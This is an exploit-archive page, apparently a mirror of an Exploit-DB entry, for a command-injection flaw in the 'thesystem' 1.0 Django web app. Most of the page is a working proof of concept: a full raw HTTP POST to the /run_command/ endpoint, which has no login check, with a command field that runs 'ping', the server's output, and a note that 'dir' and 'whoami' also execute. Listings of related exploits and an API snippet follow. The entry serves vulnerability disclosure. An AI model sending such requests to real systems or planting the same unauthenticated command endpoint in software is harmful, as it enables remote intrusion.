Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Sadik Cetin"
Platform
python
Release date
2019-09-30
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 | # Exploit Title: thesystem Command Injection # Author: Sadik Cetin # Discovery Date: 2019-09-28 # Vendor Homepage: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ] # Software Link: [ https://github.com/kostasmitroglou/thesystem | https://github.com/kostasmitroglou/thesystem ] # Tested Version: 1.0 # Tested on OS: Windows 10 # CVE: N/A # Type: Webapps # Description: # Simple Command injection after login bypass(login_required didn't used) POST /run_command/ HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------168279961491 Content-Length: 325 Connection: close Referer: [ http://127.0.0.1:8000/run_command/ | http://127.0.0.1:8000/run_command/ ] Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719 Upgrade-Insecure-Requests: 1 -----------------------------168279961491 Content-Disposition: form-data; name="csrfmiddlewaretoken" 7rigJnIFAByKlmo6NBD7R8Ua66daVjdfiFH16T7HxJrP43GhJ7m7mVAIFIX7ZDfX -----------------------------168279961491 Content-Disposition: form-data; name="command" ping 127.0.0.1 -----------------------------168279961491-- HTTP/1.1 200 OK Date: Sat, 28 Sep 2019 09:42:26 GMT Server: WSGIServer/0.2 CPython/3.5.3 Content-Length: 429 Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Pinging 127.0.0.1 with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms When I try to run following command, all commands run: dir whoami |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-10-23 | "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" | webapps | python | "Ahmet Ümit BAYRAM" |
2020-10-16 | "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" | webapps | python | "Ünsal Furkan Harani" |
2020-08-04 | "Pi-hole 4.3.2 - Remote Code Execution (Authenticated)" | webapps | python | "Luis Vacacas" |
2019-12-24 | "Django < 3.0 < 2.2 < 1.11 - Account Hijack" | webapps | python | "Ryuji Tsutsui" |
2019-10-14 | "Ajenti 2.1.31 - Remote Code Execution" | webapps | python | "Jeremy Brown" |
2019-09-30 | "TheSystem 1.0 - Command Injection" | webapps | python | "Sadik Cetin" |
2019-09-30 | "thesystem 1.0 - Cross-Site Scripting" | webapps | python | "Anıl Baran Yelken" |
2019-04-03 | "PhreeBooks ERP 5.2.3 - Remote Command Execution" | remote | python | "Metin Yunus Kandemir" |
2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
2019-01-07 | "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" | remote | python | "Mehmet Ince" |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-09-30 | "TheSystem 1.0 - Command Injection" | webapps | python | "Sadik Cetin" |
2019-09-27 | "thesystem App 1.0 - 'server_name' SQL Injection" | webapps | php | "Sadik Cetin" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47441/?format=json')
For full documentation follow the link above